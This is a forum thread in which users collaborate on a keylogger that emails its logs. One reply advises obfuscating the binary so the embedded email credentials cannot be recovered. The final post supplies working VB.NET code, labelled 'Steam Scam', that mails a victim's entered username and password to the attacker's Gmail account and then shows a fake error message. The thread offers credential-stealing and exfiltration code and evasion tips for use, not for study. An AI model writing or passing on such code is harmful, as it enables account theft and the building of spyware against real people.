0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Need help testing

Ok so i am working on a way to help perfect Neth'zul's keylogger which includes a way to send the logs via email.

I am currently running windows vista ultimate edition and i just recently downloaded visual basic and it doesnt want to cooperate with my windows vista (i hate vista but hey whatever) anyways i attached a well thought out script that should send the logs threw outlook express but i could not try to debug them afterwords. So I'm leaving it up to one of you visual basic people to debug it (note-there is no keylogger attached to it, this is just a well thought up way to send the logs to an email. If it works fine then good but if not debugging would be nice and then ill try to work with Neth'zul to add his keylogger to it.
    Attached Files Attached Files
    PM me anytime for requests on anything you need. I will be more then happy to code for a couple people a week too.

Need help testing
    Jens's Avatar Contributor
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    would love to test it, but cant download it it seems, also sending using outlook express is probably not the best way since you have to assume the user already has outlook.

if you're programming in .NET you could look into System.net.mail;
    also if you're in .NET look into obfuscation (or .net reactor if you can find it )
    the latter is because if you're using .NET its very easy to just extract the source code from the assembly, and if you're sending the logs using smtp, email and password of an external email, people could just grab it from the source and use for whatever other purpose.

Apoc's Avatar Angry Penguin
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by avec View Post
    would love to test it, but cant download it it seems, also sending using outlook express is probably not the best way since you have to assume the user already has outlook.

if you're programming in .NET you could look into System.net.mail;
    also if you're in .NET look into obfuscation (or .net reactor if you can find it )
    the latter is because if you're using .NET its very easy to just extract the source code from the assembly, and if you're sending the logs using smtp, email and password of an external email, people could just grab it from the source and use for whatever other purpose.
    Good obfuscation prevents that. (I use Dotfuscator Pro)

It renames members/methods into non-character symbols, that don't break the program itself. And also encrypts strings, only unencrypting them at runtime when their needed. (Works on any .NET application)

Brutal Pink Panther's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if its the email you cant send then use
    in the top of code index paste this
    Imports System.Net.Mail, make a button and paste this:
    Code:
    Dim mymailmessage As New MailMessage()
            Try
    mymailmessage.From = New MailAddress("sender")
                mymailmessage.To.Add("him that recives the email, ect, [email protected]")
                mymailmessage.Subject = "Steam Scam"
                mymailmessage.Body = "Username: '" + TextBox1.Text + "' Password: '" + TextBox2.Text + "'" + " Account Scammed date: Year: " + y + " Month: " + m + " Day: " + d + " Time: " + h + ":" + mi
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("the email its from", "password")
                SMTP.Send(mymailmessage)
                TextBox2.Text = ""
                MsgBox("the error :P.", MsgBoxStyle.Information, "Error")
            Catch ex As Exception
            End Try
    REMEMBER TO CHANGE THE red lines
    Thats what i use
    Last edited by Brutal Pink Panther; 08-10-2008 at 01:53 PM.